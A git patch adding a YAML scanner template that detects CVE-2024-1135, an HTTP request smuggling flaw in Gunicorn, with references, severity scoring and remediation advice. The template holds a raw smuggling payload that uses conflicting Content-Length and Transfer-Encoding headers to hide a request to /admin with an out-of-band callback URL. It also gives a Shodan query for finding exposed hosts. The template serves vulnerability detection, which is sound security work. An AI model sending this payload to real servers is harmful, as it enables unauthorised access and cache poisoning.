From a35b27bdb0a11c7597cca1561a345ac1a9e1dca8 Mon Sep 17 00:00:00 2001 From: Pwn4arn Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH] Added template for CVE-2024-1135 --- CVE-2024-1135.yaml | 61 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 CVE-2024-1135.yaml diff --git a/CVE-2024-1135.yaml b/CVE-2024-1135.yaml new file mode 100644 index 00000000000..6ef2a222a27 --- /dev/null +++ b/CVE-2024-1135.yaml @@ -0,0 +1,61 @@ +id: CVE-2024-1135 + +info: + name: Gunicorn - HTTP Request Smuggling + author: ManieshNeupane (Pwn4arn) + severity: high + description: | + Gunicorn is vulnerable to HTTP Request Smuggling due to improper validation of the Transfer-Encoding header. + If a request contains both Content-Length and a malformed or multiple Transfer-Encoding headers, Gunicorn + may fall back to Content-Length. An attacker can exploit this to bypass security controls, poison caches, + or manipulate session data. + impact: | + Successful exploitation could lead to unauthorized access to administrative endpoints or sensitive data + by smuggling a secondary request that the server processes as a separate, legitimate request. + remediation: | + Update Gunicorn to a version that properly handles Transfer-Encoding headers or ensure the frontend + proxy strictly validates these headers. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-1135 + - https://github.com/benoitc/gunicorn/releases + - https://huntr.com/bounties/22158e34-cfd5-41ad-97e0-a780773d96c1 + - https://lists.debian.org/debian-lts-announce/2024/06/msg00027.html + - https://lists.debian.org/debian-lts-announce/2024/12/msg00018.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2024-1135 + cwe-id: CWE-444 + epss-score: 0.00044 + epss-percentile: 0.1288 + metadata: + verified: true + max-request: 1 + shodan-query: product:"gunicorn" + tags: cve,cve2024,gunicorn,smuggling,network + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Length: 6 + Transfer-Encoding: chunked,gzip + + 73 + + GET /admin?callback1=https://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + 0 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 200 \ No newline at end of file